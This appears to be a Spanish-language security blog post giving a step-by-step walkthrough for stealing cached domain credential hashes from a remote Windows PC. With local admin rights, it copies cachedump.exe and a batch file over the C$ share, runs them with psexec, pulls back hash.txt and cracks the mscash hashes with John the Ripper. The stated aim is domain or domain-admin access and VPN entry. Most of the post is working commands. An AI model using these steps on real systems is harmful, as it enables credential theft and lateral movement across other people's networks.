La pregunta que seguramente se están haciendo en este momento debe ser: Por que motivo voy a obtener los hashes si ya tengo acceso de administrador local?
La respuesta es simple, puede ser para obtener otras credenciales de usuarios de dominio, nosotros tenemos solo la password del administrador local, el cual no tiene acceso a la VPN. En cambio si obtenemos el hash de un usuario de dominio y lo crackeamos, podriamos tener acceso a la red remotamente.
Por defecto windows cachea localmente los hashes de usuarios de dominio en el registro, esto lo realiza por si en algun momento el controlador de dominio donde se autentica el usuario no esta disponible. En el caso de una notebook, cuando un usuario la desconecta de la red interna y se la lleva a su casa no podria loguearse con su user ya que no tiene donde validar las credenciales.
Algo mas interesante seria si un usuario con privilegios de administrador de dominio se hubiese logueado en algun momento en dicha maquina, obtendriamos el hash, lo crackeariamos y si obtenemos exito seriamos admin. del dominio.
1) Descargamos la herramienta cacheDump desde: CacheDump
2) Creamos un archivo cache.bat que contenga dentro lo siguiente:
c:\cachedump.exe > c:\hash.txt
Este bat contiene la ruta del cachedump.exe y la salida de dicha ejecucion (los hashes) la anviara a un archivo llamado hash.txt ubicado en el c:
3) Accedemos remotamente al disco remoto mediante \\192.168.1.100\c$ y copiamos en el C el cachedump.exe y el cache.bat. Esto podemos hacerlo porque tenemos acceso como admin local de dicha Pc. Si queremos usuar la CLI lo hacemos con xcopy:
c:\> xcopy cachedump.exe "\\192.168.1.100\c$"
c:\> xcopy cache.bat "\\192.168.1.100\c$"
4) Ejecutamos el cache.bat con psexec (Para uso y descarga de psexec ver el link: http://www.redes-seguridad.com.ar/2011/12/ejecutar-tareas-remotamente-pstools.html)
c:\> psexec -s -i -d \\192.168.1.100 c:\cache.bat
5) Copiamos el hash.txt del c: remoto a nuestra PC:
c:\>xcopy \\192.168.1.100\c$\hash.txt c:\
6) Vemos el contenido de los usuarios, los hashes y el dominio:
c:\> type hash.txt
user1:A12BC15F401B96733F47912084CDD651:mi-dominio:mi-dominio.com
user2:31765416AFBACB8976563DBFE90155D:mi-dominio:mi-dominio.com
7) Ataque de diccionario con John:
(Para instalarlarlo en linux consultar este link: http://www.redes-seguridad.com.ar/2011/12/cracking-passwd-con-john-ripper.html)
root@morsa:~# john --wordlist=lista.txt -format:mscash hash.txt
lista.txt => es un archivo de texto que contiene palabras de diccionario
hash.txt => es el hash que obtuvimos de la pc atacada
8) En cambio si no logramos nada con ataque por diccionario tendremos que hacer uno por fuerza bruta, incremental:
root@morsa:~# john --incremental -format:mscash hash.txt
No hay comentarios:
Publicar un comentario